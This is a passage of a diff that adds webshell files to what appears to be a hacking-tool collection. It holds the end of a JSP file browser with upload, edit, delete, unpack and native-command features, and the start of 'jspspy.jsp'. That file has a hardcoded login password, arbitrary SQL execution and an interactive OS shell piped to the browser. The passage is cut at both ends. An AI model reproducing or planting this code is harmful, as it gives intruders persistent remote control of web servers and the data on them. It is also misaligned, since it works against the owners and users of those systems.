    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println("" + conv2Html(entry.getName()) + + ""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + if (!ALLOW_UPLOAD){ + request.setAttribute("error", "Upload is forbidden!"); + } + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")), false)){ + //This is a hack, cos we are writing to this directory + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". 
Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef, true)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +
    +

    Edit <%=conv2Html(request.getParameter("editfile"))%>


    +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + "

    + + "> + "> + + + + + + + +
    >Ms-Dos/Windows + >Unix + Write backup
    +
    + + "> + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + if (request.getParameter("Submit").equals("Save")) { + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f, true)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root), true)){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + 
f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. 
Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) 
&& !file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, new_file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // The error conditions: + // 1) Zero Files selected + else if (v.size() <= 0) request.setAttribute("error", + "Select exactly one file or folder. Rename failed"); + // 2a) Multiple files selected and the first isn't a dir + // Here we assume that expandFileList builds v from top-bottom, starting with the dirs + else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( + "error", "Select exactly one file or folder. Rename failed"); + // 2b) If there are multiple files from the same directory, rename fails + else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() + && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { + request.setAttribute("error", "Select exactly one file or folder. 
Rename failed"); + } + else { + File f = (File) v.get(0); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + // Test, if file_name is empty + else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { + if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { + request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("message", "Renamed file " + + ((File) v.get(0)).getName() + " to " + new_file); + } + else request.setAttribute("error", "Error: \"" + new_file_name + + "\" is not a valid filename"); + } + } + // Move selected file(s) + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(MOVE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), false)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + // This ensures that new_dir is a directory + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + else if (!f.canWrite() || !f.renameTo(new File(new_dir + + f.getAbsolutePath().substring(dir.length())))) { + request.setAttribute("error", "Cannot move " + f.getAbsolutePath() + + ". 
Move aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Copy Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(COPY_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String) request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir += File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else{ + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir += File.separator; + try { + byte buffer[] = new byte[0xffff]; + for (int i = 0; i < v.size(); i++) { + File f_old = (File) v.get(i); + File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); + if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){ + request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); + error = true; + } + else if (f_old.isDirectory()) f_new.mkdirs(); + // Overwriting is forbidden + else if (!f_new.exists()) { + copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); + } + else { + // File exists + request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() + + ", file already exists. Copying aborted"); + error = true; + break; + } + } + } + catch (IOException e) { + request.setAttribute("error", "Error " + e + ". 
Copying aborted"); + error = true; + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); + else if (!error) request.setAttribute("error", "No files selected"); + } + } + // Directory viewer + if (dir_view && request.getAttribute("dir") != null) { + File f = new File("" + request.getAttribute("dir")); + //Check, whether the dir exists + if (!f.exists() || !isAllowed(f, false)) { + if (!f.exists()){ + request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); + } + else{ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + //if attribute olddir exists, it will change to olddir + if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) { + f = new File("" + request.getAttribute("olddir")); + } + //try to go to the parent dir + else { + if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent()); + } + //If this dir also do also not exist, go back to browser.jsp root path + if (!f.exists()) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) path = new File( + application.getRealPath(request.getRequestURI())).getParent(); + + if (path == null) // handle the case were we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + f = new File(path); + } + if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath()); + else request.setAttribute("dir", null); + } +%> + +<%=request.getAttribute("dir")%> + + +<% + //Output message + if (request.getAttribute("message") != null) { + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); + } + //Output error + if (request.getAttribute("error") != null) { + out.println("
    "); + out.println(request.getAttribute("error")); + out.println("
    "); + } + if (request.getAttribute("dir") != null){ +%> + +
    + Filename filter: +

    + +<% + // Output the table, starting with the headers. + String dir = URLEncoder.encode("" + request.getAttribute("dir")); + String cmd = browser_name + "?dir=" + dir; + int sortMode = 1; + if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request + .getParameter("sort")); + int[] sort = new int[] {1, 2, 3, 4}; + for (int i = 0; i < sort.length; i++) + if (sort[i] == sortMode) sort[i] = -sort[i]; + out.print("" + + "" + + "" + + "" + + ""); + if (!READ_ONLY) out.print (""); + out.println(""); + char trenner = File.separatorChar; + // Output the Root-Dirs, without FORBIDDEN_DRIVES + File[] entry = File.listRoots(); + for (int i = 0; i < entry.length; i++) { + boolean forbidden = false; + for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { + if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; + } + if (!forbidden) { + out.println(""); + out.println(""); + } + } + // Output the parent directory link ".." + if (f.getParent() != null) { + out.println(""); + out.println(""); + } + // Output all files and dirs and calculate the number of files and total size + entry = f.listFiles(); + if (entry == null) entry = new File[] {}; + long totalSize = 0; // The total size of the files in the current directory + long fileCount = 0; // The count of files in the current working directory + if (entry != null && entry.length > 0) { + Arrays.sort(entry, new FileComp(sortMode)); + for (int i = 0; i < entry.length; i++) { + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String type = "File"; // This String will tell the extension of the file + if (entry[i].isDirectory()) type = "DIR"; // It's a DIR + else { + String tempName = entry[i].getName().replace(' ', '_'); + if (tempName.lastIndexOf('.') != -1) type = tempName.substring( + tempName.lastIndexOf('.')).toLowerCase(); + } + String ahref = ""; + String link = buf; // The standard view link, uses Mime-type + if (entry[i].isDirectory()) { + if 
(entry[i].canRead() && USE_DIR_PREVIEW) { + //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip + File[] fs = entry[i].listFiles(); + if (fs == null) fs = new File[] {}; + Arrays.sort(fs, new FileComp()); + StringBuffer filenames = new StringBuffer(); + for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { + String fname = conv2Html(fs[i2].getName()); + if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); + else filenames.append(fname + ";"); + } + if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); + else if (filenames.length() > 0) filenames + .setLength(filenames.length() - 1); + link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" + + FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].canRead()) { + link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; + } + else link = FOL_IMG + "[" + buf + "]"; + } + else if (entry[i].isFile()) { //Entry is file + totalSize = totalSize + entry[i].length(); + fileCount = fileCount + 1; + if (entry[i].canRead()) { + dlink = ahref + "downfile=" + name + "\">Download"; + //If you click at the filename + if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" + + buf + ""; + else link = ahref + "file=" + name + "\">" + buf + ""; + if (entry[i].canWrite()) { // The file can be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">Edit"; + } + else { // If the file cannot be edited + //If it is a zip or jar File you can unpack it + if (isPacked(name, true)) elink = ahref + "unpackfile=" + name + + "\">Unpack"; + else elink = ahref + "editfile=" + name + "\">View"; + } + } + else { + link = buf; + } + } + String date = dateFormat.format(new Date(entry[i].lastModified())); + out.println(""); + if (entry[i].canRead()) { + out.println(""); + } + else { + out.println(""); + } + out.print(""); + if (entry[i].isDirectory()) 
out.print(""); + else { + out.print(""); + } + out.println(""); // The download link + if (!READ_ONLY) + out.print (""); // The edit link (or view, depending) + out.println(""); + } + }%> +
     NameSizeTypeDate  
     "); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("  [" + buf + "]"); + out.print("    
    "); + out.println("  " + FOL_IMG + "[..]"); + out.print("    
     " + link + " " + + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) + date + "" + // The date the file was created + dlink + "" + elink + "
    + Select all +

    + + <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> + +

    + "> + + + <% if (!READ_ONLY) {%> + + <% } %> + <% if (!READ_ONLY) {%> +
    + + + + + + + <% } %> +
    +
    +
    + <% if (ALLOW_UPLOAD) { %> +
    + "> + + + +
    + <%} %> + <% if (NATIVE_COMMANDS) {%> +
    + "> + + + +
    <% + }%> +
    + <%}%> +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
+<%
+ }
+%>
diff --git a/jsp/hackk8/JSP/other/jspspy.jsp b/jsp/hackk8/JSP/other/jspspy.jsp
new file mode 100644
index 0000000..219d801
--- /dev/null
+++ b/jsp/hackk8/JSP/other/jspspy.jsp
@@ -0,0 +1,2329 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By admin +* Date 2009-12-17 +* Blog http://www.baidu.com/ +* Huan . I Love You. +*/ +private static final String PW = "max"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { 
+this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} 
+public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? 
"" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = 
Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) 